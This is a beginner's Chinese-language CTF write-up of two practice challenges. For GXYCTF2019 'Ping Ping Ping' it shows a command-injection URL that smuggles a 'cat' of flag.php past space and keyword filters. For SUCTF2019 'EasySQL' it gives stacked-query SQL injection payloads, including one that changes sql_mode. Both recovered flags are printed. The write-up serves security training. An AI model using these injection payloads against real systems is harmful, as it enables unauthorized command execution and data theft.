[GXYCTF2019]Ping Ping Ping 1和[SUCTF 2019]EasySQL 1新手解题过程

1、[GXYCTF2019]Ping Ping Ping 1

我们直接查看flag.php,提示我们/?ip= fxck your space!,无法直接查看flag.php,需要绕过空格。

[http://57c6df34-c9c9-45c5-8f85-a4ef66c1211d.node5.buuoj.cn:81/?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php](http://57c6df34-c9c9-45c5-8f85-a4ef66c1211d.node5.buuoj.cn:81/?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php "http://57c6df34-c9c9-45c5-8f85-a4ef66c1211d.node5.buuoj.cn:81/?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php")

<!--?php

$flag = "flag{0b46a562-1574-4bfe-87ae-356928a78954}";

?-->

2、[SUCTF 2019]EasySQL 1

随便输入一个数字回显Array ( [0] => 1 ),输入其他内容回显Nonono。

猜测该系统后台代码为:select $_POST['query'] || flag from flag [1] ,且那么直接在1前面拼接*,即*,1,解得flag:

flag{4151e8ed-491a-4c8b-bc72-c076522a4936}

1;show tables; 发现Flag表

构造payload为:1;set sql_mode=PIPES_AS_CONCAT;select 1 ,相当于是将select 1 和 select flag from Flag 的结果拼接在一起,也就是 select 1;的结果拼接select flag from Flag的结果。

相关推荐
Rick199318 小时前
SQL 执行流程
数据库·sql
fzb5QsS1p19 小时前
告别重复造轮子,Qt 快速开发脚手架
开发语言·qt·php
千枫s19 小时前
电脑vm虚拟机kali linux安装shannon
学习·网络安全
Y0011123619 小时前
MySQL-进阶
开发语言·数据库·sql·mysql
数字供应链安全产品选型20 小时前
AI造“虾”易,治理难?悬镜多模态 SCA 技术破局 AI 数字供应链治理困局!
人工智能·安全·网络安全·ai-native
网络安全许木20 小时前
自学渗透测试第12天(渗透测试流程与DVWA部署)
web安全·网络安全·渗透测试
聊点儿技术20 小时前
IP风险评分80分是怎么算出来的?从权重分配到计算逻辑
网络安全·金融·ip·电商·ip风险评估·风控开发·评估ip风险
ALex_zry21 小时前
gRPC服务熔断与限流设计
c++·安全·grpc
取码网21 小时前
最新临时文件快传系统源码 轻量化 带后台
php
彧翎Pro21 小时前
ASP.NET Core 外部依赖调用治理实战:HttpClientFactory、Polly 与幂等边界
microsoft·asp.net·php